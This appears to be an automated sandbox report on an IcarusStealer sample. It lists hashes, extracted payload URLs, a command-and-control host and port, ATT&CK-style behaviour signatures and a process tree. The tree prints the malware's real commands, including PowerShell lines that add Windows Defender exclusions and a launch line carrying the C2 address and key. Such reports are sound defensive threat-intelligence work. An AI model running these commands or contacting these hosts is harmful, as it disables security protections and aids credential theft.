Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
03-07-2024 02:28
General
-
Target
savedblack.exe
-
Size
494KB
-
MD5
2089eac1493e5034f266fb8a5a3a2d91
-
SHA1
35e5341c15062df6c7d4fcfad0ce7ff4cb606629
-
SHA256
1a18bb8dd805fba37b7afa53ece89b4ceab58f7c75b462d1de9c2ddcea056c67
-
SHA512
025d238696aabd645fb2ec6c7456ffc18dff7bb59893579ea445c8f10b0c67d56980ee8f0354d399ece2f94ae05b5c72ccbe77e5241fcd559eb1639e4d0cc09e
-
SSDEEP
12288:Oe+CrtuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Q1:j9Z6N6LqQzJqk2
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 2 IoCs
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 25 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 35 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\savedblack.exe"C:\Users\Admin\AppData\Local\Temp\savedblack.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b0lha3xg\b0lha3xg.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8107.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEA5B6C87225045D580956D9148B96767.TMP"3⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ctfmon.exectfmon.exe3⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client notes-ease.gl.at.ply.gg 22444 PUGlcQLxe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5xtmcih3\5xtmcih3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBBEC61660FC46949422A1D77D736726.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SMSHoists.exeC:\Users\Admin\AppData\Local\Temp\SMSHoists.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM SMSHoists.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SMSHoists.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1uwmlnok\1uwmlnok.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F3D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC342901EE66C14A74B01631B232E836F7.TMP"4⤵
-
-
-
C:\Windows\notepad.exeC:\Windows\notepad.exe3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Start.exeC:\Users\Admin\AppData\Local\Temp\Start.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
15KB
MD548cad54b18ef38482e08cc3863992da4
SHA1109fbc3c9a1bf48e6492214ee2997b1c570711bc
SHA2566d87b62807c50e472e0f00006cd4d626a3267549b8146ad2574fc2ba04d6d605
SHA5124db44d15ce7d911379e746bfa7a4006477f41e299783ccbd17a9733cdb66e793d69c77edaff2bfa3a8357234794d7c3c29c0222a330258de3c1ed895da6985a6
-
Filesize
712B
MD5f0db127842e5610a1b98e836171b71d1
SHA125c6f73574d35e45907123726aa7e3e41feb31a7
SHA2560a0abe6ec19085e975e943df365f3b244412809b30aeb604031c350d3d24528d
SHA5120301a5171b0cf30844cd6f5b8eef412ec565e795b18c2ce4a44298a719c0f1c325a52c5e21dd1b5548de0d111f641ca4c58352b1df5f9a9dca2f2f40a00f587f
-
Filesize
334KB
MD5970211af3cccda80e4db355181c57e69
SHA19d1db00434ba88ac9fa8707118b8a0a472bd7b38
SHA256023c2f99f1c15f6973bac13db1dbd7b871bc8ebcdcc9946ac0cdf8c852f25db5
SHA5123efc780d3f3102920e09b4d838aa5c6ac8c95665d881982fb5c6055ce0c7ebd83c160aee15961c1403000e2a79eed76e2b83cf3507a92401aa003750f0a0a92b
-
Filesize
1KB
MD50da8e6666c94d31685e13cdd70ec82dc
SHA10b6ec1ceb5ea478d8d45fd014d7038faa79e77a6
SHA256c88c2912c829a5b5535c146652081db8333aa161b52156dd43d38723773b4a34
SHA5121375bbbce0629d665e64c79bdda47d60a0dad2ca38443c9a69475de13e1e22471a32f022ed537a1554e7877eb83d068b3112fc1c23495566dbcb42e51c734957
-
Filesize
1KB
MD50e244ce75a16eca51302ee81d5fceb1f
SHA147550654bb727f36a58b43561062bc79369671dd
SHA25687dea27ec0ee37c773280aacd1840175c519b1f99ef1f218267f4ee2e46e5ab7
SHA512686a7f015d2bb37d27205e07a2b3fb98c05c04f5eca1e05e69e42c1d1657f8e6647ca8e78a448de4b8ee95744ff52960d25ddc1130e423f96e92655e51affd55
-
Filesize
1KB
MD5dce4e182afd18aacedb551833dea8f2b
SHA1c36b4bbaafb37242b76d42d66ae2ab35556d536b
SHA256c79f2dc1593851dfc31ab4652acdf4acae7c1518e4dc5c2017b7e3984f356db9
SHA51244095af5274903942ee5c30e07825c773aec4112b1b6ec3e9e778573d77e2560b7799857466a4eb0aca8d1202c571dd1d45c740d8af9fb6de18b6295e0e2ad8d
-
Filesize
4KB
MD5c5fc01c331cfef45b3cd88f1ba9e1a68
SHA132946fe250170a54430b3789d389324dfbae3e01
SHA256af184f25d69656be3d8b4b26cf54e4e9228a8386b37d6f6e86e7f0c4067c4b42
SHA5122cae0a76293edad791a15b7031c75dcd97a7886a5d6841b935b0ff02b79955bbcbb0cc6170a75687ef96cad8fdf4eee899bb5d88cf036fe4b73631769ab495b0
-
Filesize
4KB
MD54458a96559a0afbc29cafe645169fb22
SHA1607f527545bbd1532024e31395cd17fc2dea4415
SHA25659196d090c0e82fb685e291c7f0c122e3bbff3f22d674d0534ac0dbabbfec2dd
SHA512a99f811f50a68314b0f852362d5dbdf3acb4fa8777425c0612608f4dab9f9bf48634d9adc9ac6f5ca47a85f02394c0cf197d8016ed6c52d9fc5ea378310a6c3b
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
451B
MD566566d8d022d467ae2f7f701f1ece8a4
SHA13449347d87630b9af5852ea4fff918d54ac30923
SHA256b185bc7eaa5f466f8783e035b5966166f27f92f2593a41a4edac649ed87c4247
SHA512720eb3fb7f09b6ad2c5345c779efaf60bbf03dfccd7ed8a630a113162989fdfc09abc302a2055bf8131f503fcaa7f8fc721b8828123a4580d75a66a984aa21c1
-
Filesize
1KB
MD599e19d86ac0d1a7c824b4f95eb85a09c
SHA1f942d4b0e891b6c7e37f76a98c8f06f0e87b0dbb
SHA256d0b7f831c8935682f52aebbcfa631d97715b83e1267cb2b7bf71533942945863
SHA512698bdd2a512f498fff28a6a55561919f2cb13847e757408b87aa53f8efaccb13d1bf171e2192298f487217b71a9312af377276f33ddd92ee9952924eadcbc049
-
Filesize
451B
MD5cf6405a5d9fceee728b3822c0c56712c
SHA1c16a52f2c9366e8ecf72dd7902b12ea66b1aa448
SHA2561ec656bd8840e2eb352111fef94416936461a37e02079c7e289abdff16e82f24
SHA5123a1dc754e334eed6cc142310a212e53c8d5fbe0bfe4b7da38e5b9e33718fedac63d3021f2d41c98e93a554227169540541bee22824459af318b202568aa7bdd3
-
Filesize
1KB
MD5be7ee5c1b32c4c11ab8d5855c0a674a2
SHA14b1459595dd3e98efc33d5b17d0d57ab07e181bc
SHA2566b3182ccdb0009b1f400d59a30915bf72319b0969a6717460af9cd1d940f5bef
SHA51261be4353f0ef7c67513e0c93a22de404f897ee83a519e2d9c352cb3d4ba584d236bf99476b64238d15f1bbdef22c333cb0f8e75255d6cc8756739c928ecf131e
-
Filesize
1KB
MD5810535a8ae563d6aa53635a1bb1206ff
SHA1f5ba39f1a455eb61efe5022b524892249ee75dce
SHA2567f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA5125662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
447B
MD51bab95d9e322f3e91c3f423f97810c90
SHA185001c3e23be288a7a0dc3fea71653929b87eb26
SHA2562923acde17063cd40b09f9046277db7ac53b08f82c4b45c5d3abbe303d5a676e
SHA5126619c43c584c28c70266337c742cf27c6a8c31782696f7066023453df46d28de997a6be6230e1afb595ab0308964f9c93d5754a34b45428d981654bb5f6e0ce2
-
Filesize
32KB
-
Filesize
472KB
-
Filesize
32KB
-
Filesize
300KB
-
Filesize
112KB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
204KB
-
Filesize
120KB
-
Filesize
136KB
-
Filesize
660KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
144KB
-
Filesize
520KB
-
Filesize
584KB
-
Filesize
6.9MB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
300KB
-
Filesize
6.2MB
-
Filesize
592KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB